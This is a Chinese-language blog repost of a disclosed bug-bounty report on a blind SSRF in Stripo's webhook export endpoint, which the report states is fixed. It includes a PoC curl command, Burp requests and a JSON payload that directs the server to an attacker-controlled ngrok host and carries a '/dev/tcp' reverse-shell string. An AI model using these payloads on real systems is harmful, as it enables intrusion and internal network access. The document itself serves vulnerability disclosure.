Stripo 邮箱编辑器 Blind SSRF 漏洞分析与利用详情

2025-12-14
福建
本文字数：1971 字
阅读完需：约 6 分钟

漏洞概述

本报告涵盖在 Stripo 导出服务中发现的一个严重的 Blind SSRF（服务器端请求伪造）漏洞。SSRF 漏洞允许攻击者操纵服务器，使其向内部或外部系统发起任意请求，可能导致严重的安全漏洞。该漏洞存在于端点 /exportservice/v3/exports/WEBHOOK/accounts。通过在 webhookUrl 参数中提供恶意输入，攻击者可以触发 SSRF，使服务器能够向攻击者控制的系统发起未经授权的 HTTP 请求。

漏洞利用详情

概念验证(PoC)

以下 curl 命令演示了漏洞利用过程：

curl -i -X POST 'https://my.stripo.email/bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412' \--data '{  "id": 52027412,  "name": "sh -i & devtcp192.168.100.3 0&1",  "oAuthRequired": false,  "authLink": null,  "draft": false,  "destination": "WEBHOOK",  "properties": {    "headers": [      {        "name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",        "value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"      }    ],    "accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",    "webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",    "webhookType": "CUSTOM"  },  "public": false}'

复制代码

生成的 HTTP 请求

处理时，应用程序会向指定的 webhookUrl 生成以下 HTTP 请求：

POST /webhook/sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.100.3%2F9001%200%3E%261/ HTTP/1.1Host: 5290-101-255-157-9.ngrok-free.appUser-Agent: Apache-HttpClient/4.5.14 (Java/21.0.5)Content-Length: 104Accept: application/jsonAccept-Encoding: gzip,deflateTraceparent: 00-58ae5f178436f516dfed5bcabe66e0a4-6f1c4d73cae918b9-00X-Forwarded-For: 54.247.167.106X-Forwarded-Host: 5290-101-255-157-9.ngrok-free.appX-Forwarded-Proto: https

复制代码

通过 Burp Suite 发起的 HTTP 请求

POST /bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412 HTTP/1.1Host: my.stripo.emailContent-Type: application/jsonContent-Length: 457
{  "id": 52027412,  "name": "sh -i & devtcp192.168.100.3 0&1",  "oAuthRequired": false,  "authLink": null,  "draft": false,  "destination": "WEBHOOK",  "properties": {    "headers": [      {        "name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",        "value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"      }    ],    "accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",    "webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",    "webhookType": "CUSTOM"  },  "public": false}

复制代码

攻击载荷

{ "id": 52027412, "name": "sh -i & devtcp192.168.100.3 0&1", "oAuthRequired": false, "authLink": null, "draft": false, "destination": "WEBHOOK", "properties": { "headers": [ { "name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1", "value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1" } ], "accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1", "webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1", "webhookType": "CUSTOM" }, "public": false}

复制代码

影响

数据泄露：攻击者可利用 SSRF 访问敏感的内部网络数据，例如云元数据、内部 API 端点或其他受限服务。
端口扫描：可利用该漏洞进行端口扫描。
内部资源访问：Blind SSRF 允许访问内部服务或端点，绕过网络限制。
组合攻击：可能引发更高级的利用，例如检索敏感元数据或执行远程命令。

处理时间线

2025 年 1 月 13 日：漏洞由 odaysec 提交给 Stripo Inc。
2025 年 1 月 21 日：Stripo 员工 nikandrov_nikolai 将状态更改为“已分类”，并创建任务进行解决。
2025 年 4 月 23 日：odaysec 复查漏洞，确认端点 /bapi/exportservice/v3/exports/webhook/accounts/{uid} 的问题已修复，请求将报告标记为已解决。
同日：Stripo 员工 nikandrov_nikolai 关闭报告并将状态更改为“已解决”。
同日：odaysec 请求披露此报告并获得同意。
3 天前：本报告已被披露。

报告详情

报告 ID：#2932960
状态：已解决
严重性：严重 (9 ~ 10)
披露日期：2025 年 12 月 1 日
弱点：服务器端请求伪造 (SSRF)
CVE ID：无
赏金：隐藏
账户详情：无 biOK/hzhVF2yKaGc5mK8oUeM+Q0dUCqUnNt5/B4HEmm4zetCE0QDP5gVzmN/R22E 更多精彩内容请关注我的个人公众号公众号（办公 AI 智能小助手）对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

办公AI智能小助手

公众号二维码

网络安全技术点滴分享

发布于: 刚刚阅读数: 5

qife122

关注

还未添加个人签名 2021-05-19 加入

还未添加个人简介

发布

暂无评论

创作场景

Stripo 邮箱编辑器 Blind SSRF 漏洞分析与利用详情

漏洞概述

漏洞利用详情

概念验证(PoC)

生成的 HTTP 请求

通过 Burp Suite 发起的 HTTP 请求

攻击载荷

影响

处理时间线

报告详情

qife122

评论